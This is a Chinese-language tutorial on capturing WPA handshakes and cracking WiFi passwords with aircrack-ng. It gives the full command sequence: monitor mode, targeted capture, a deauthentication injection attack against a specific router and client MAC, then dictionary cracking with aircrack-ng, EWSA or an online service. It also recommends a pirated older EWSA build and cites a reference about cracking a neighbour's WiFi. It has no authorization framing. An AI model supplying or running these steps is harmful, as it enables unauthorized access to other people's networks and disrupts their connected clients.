Airmon-ng抓包&破解wifi

• 安装 
   
  aircrack获取(aircrack源)
   
  

  sudo apt-get install aircrack-ng

  配置 安装组件
   
  

  sudo apt-get install build-essential libssl-dev pkg-config libnl-3-dev libnl-genl-3-dev

    
  关闭网络功能 (未关闭监听的时候会无法获得正确的信息)

service net-manager stop

关闭相关进程

sudo airmon-ng check kill

 

• 监听 
   

查看本机的网卡  (可以看到我的电脑上有一块无线网卡wlp3s0)

iwconfig

打开网络监听  (wlp3s0为你选择的网卡的名称，并且我们可以在右下角看到接口名 mon0) 

airmon-ng start wlp3s0

监听所有wifi（这个窗口可以关掉）

sudo airodump-ng mon0

监听特定的频道（*=频道号）(/home/tmp=包存放路径）

airodump-ng -c * --bssid C8:3A:35:5C:D6:F8 -w /home/tmp mon0

 

• 抓包 
   
  注入攻击（2=攻击次数）（C8:3A:35:5C:D6:F8=路由器mac）(A0:86:C6:A3:F3:05=被监听的客户机MAC地址)
  
  
  

  sudo aireplay-ng -0 2 -a C8:3A:35:5C:D6:F8 -c A0:86:C6:A3:F3:05 mon0

 

监听终端右上WAP handshake时说明抓包成功 

 

 

• 破解 
  
  aircrack-ng算号

aircrack-ng -w *.txt *.cap

 
EWAS算号(Windows系统) 
 
ewas算号使用7.0高版本未注册版 (可实现 CPU&显卡 加速 7w~10w/s) 
默认情况需要禁用 字典设置-密码突变选项 
算出来密码不可见 将项目导入低版本破解版(实测6.0可用)密码可见 
 

GPUHASH.me（wpa在线破解） 

 
 

• 善后
  
  关闭网络监听
  
  

  airmon-ng stop mon0
  

  打开网络
  
  

  service network-manager start

• Bug
  
  无线网卡监听时出现“fixed channel mon0: -1”错误（内核问题）
  
  1. 监听特定的频道和抓包注入攻击时末尾添加--ignore-negative-one即可避免报错
  
  2. 重新启动系统
  
  3. 更换系统内核版本

 

————————————————————以下参考————————————————————

Ubuntu下用aircrack破解WIFI密码 

 

Ubuntu14.04－64位使用aircrack-ng和minidwep-gtk破解WIFI密码的图文教程 

 

用Hashcat每秒计算1.4亿个密码，破解隔壁WIFI密码